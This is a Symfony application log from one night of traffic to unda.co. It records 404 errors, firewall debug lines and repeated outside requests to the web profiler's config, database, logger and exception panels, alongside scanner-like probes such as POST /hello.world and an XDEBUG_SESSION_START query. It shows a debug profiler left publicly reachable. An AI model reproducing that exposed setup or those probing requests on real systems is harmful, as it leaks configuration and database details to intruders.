[2025-12-16 01:51:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+i+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+i+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:55:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=time","method":"GET"} []
[2025-12-16 01:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 01:56:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+a.getAttribute("" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+a.getAttribute(\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:03:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+e.documentBaseURI.toAbsolute(t)+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+e.documentBaseURI.toAbsolute(t)+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:04:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"344819","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/344819/search/results?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
[2025-12-16 02:04:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
[2025-12-16 02:19:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9","method":"GET"} []
[2025-12-16 02:19:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 02:20:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-16 02:20:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
[2025-12-16 02:22:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:31:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
[2025-12-16 02:31:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 02:34:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.woff"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.woff\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:38:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.eot"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.eot\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:41:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 02:42:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/misc/gallery/'+n+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/misc/gallery/'+n+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:51:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=db","method":"GET"} []
[2025-12-16 02:51:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 02:53:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.ttf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.ttf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:54:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 02:54:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 02:54:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 02:54:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 02:54:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 02:54:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 02:54:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 02:55:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 02:55:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 02:55:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 02:56:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 02:56:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=dump","method":"GET"} []
[2025-12-16 02:56:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 02:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.eot"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.eot\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 03:09:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-16 03:09:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
[2025-12-16 03:18:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.woff"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.woff\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 03:21:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.ttf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.ttf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 03:22:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 03:25:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3152a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3152a","method":"GET"} []
[2025-12-16 03:25:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 03:26:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 03:27:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 03:27:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 03:27:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 03:27:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 03:27:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 03:27:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 03:27:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 03:33:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d6c41d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d6c41d","method":"GET"} []
[2025-12-16 03:33:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 03:34:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"006517","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/006517/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-16 03:34:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-16 03:45:20] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 03:45:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 03:45:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 03:45:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 03:45:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 03:45:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 03:45:20] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 03:45:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-16 03:45:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=db","method":"GET"} []
[2025-12-16 03:45:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 03:47:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
[2025-12-16 03:47:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 03:57:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 04:10:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"01b850","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/01b850","method":"GET"} []
[2025-12-16 04:10:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 04:14:13] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 04:17:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3fdca8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3fdca8/search/results?ip=189.172.24.201&limit=10&method=GET","method":"GET"} []
[2025-12-16 04:17:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.24.201&limit=10&method=GET","method":"GET"} []
[2025-12-16 04:29:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 04:49:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"645f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/645f32","method":"GET"} []
[2025-12-16 04:49:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 05:06:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=config","method":"GET"} []
[2025-12-16 05:06:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 05:12:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
[2025-12-16 05:12:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-16 05:13:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
[2025-12-16 05:16:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 05:21:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 05:22:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-16 05:22:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-16 05:23:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9a058","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9a058/search/results?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
[2025-12-16 05:23:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
[2025-12-16 05:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=exception","method":"GET"} []
[2025-12-16 05:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 05:46:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-16 05:48:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 05:55:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
[2025-12-16 05:55:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 06:10:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //auth.unda.co/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //auth.unda.co/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
